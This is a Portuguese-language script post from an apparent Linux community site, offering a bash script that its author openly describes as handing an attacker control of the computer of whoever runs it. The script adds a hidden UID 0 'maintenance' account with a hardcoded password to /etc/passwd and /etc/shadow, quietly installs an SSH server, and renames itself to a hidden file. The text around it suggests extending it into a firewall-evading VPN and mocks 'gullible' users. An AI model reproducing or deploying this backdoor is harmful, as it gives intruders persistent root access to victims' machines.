Criando usuário com poderes de root
Publicado por Marcelo (última atualização em 17/10/2009)
[ Hits: 7.307 ]
Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.
Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.
É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!
#!/bin/bash # verifica se o usuário está como root if [ "`id -u`" != "0" ]; then echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.' read pausa exit 0 fi # verifica se o script de cadastro de senha existe, se não, ele mesmo o cria # o usuário será maintenance e a senha mdpasswd if [ "`find -name cad.main`" = "" ]; then touch cad.main echo "#!/usr/bin/expect" >> cad.main echo "set timeout 30" >> cad.main echo "spawn passwd maintenance" >> cad.main echo "set password \"mdpasswd"\" >> cad.main echo "expect \"Enter new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "expect \"Retype new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "send \"exit"\" >> cad.main echo "expect \"eof\"" >> cad.main chmod +x cad.main fi # verifica se o programa expect está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep expect `" = "" ]; then aptitude install expect >> /dev/null fi # verifica se o servidor ssh está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep openssh-server`" = "" ]; then aptitude install openssh-server >> /dev/null fi # verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then expect cad.main >> /dev/null exit 0 fi # se o usuário não existir, ele será criado echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow expect cad.main >> /dev/null # remove o arquivo de cadastro de usuário rm -rf cad.min # oculta este script mv login.super .login.super exit 1
Script que sincroniza a mensagem de cópia de pendrive com o processo real
duplex_record: mixando áudio do microfone e saída de áudio de um programa via P
Fluxbox - Slideshow de wallpapers aleatórios
Script para adicionar usuarios ftp
Nenhum comentário foi encontrado.
Patrocínio
Destaques
Artigos
Bluefin - A nova geração de ambientes de trabalho Linux
Como atualizar sua versão estável do Debian
Cirurgia para acelerar o openSUSE em HD externo via USB
Dicas
Quer auto-organizar janelas (tiling) no seu Linux? Veja como no Plasma 6 e no Gnome
Copiando caminho atual do terminal direto para o clipboard do teclado
Script de montagem de chroot automatica
Tópicos
Conselho distribuiçao brasileira (5)
archlinux resolução abaixou após atualização (15)
Não consigo instalar distro antiga no virtualbox nem direto no hd (33)
Top 10 do mês
-
Xerxes
1° lugar - 146.826 pts -
Fábio Berbert de Paula
2° lugar - 64.347 pts -
Buckminster
3° lugar - 22.174 pts -
Alberto Federman Neto.
4° lugar - 20.177 pts -
Mauricio Ferrari
5° lugar - 19.566 pts -
edps
6° lugar - 17.873 pts -
Daniel Lara Souza
7° lugar - 17.392 pts -
Andre (pinduvoz)
8° lugar - 15.922 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
9° lugar - 15.517 pts -
Jesuilton Montalvão
10° lugar - 14.748 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
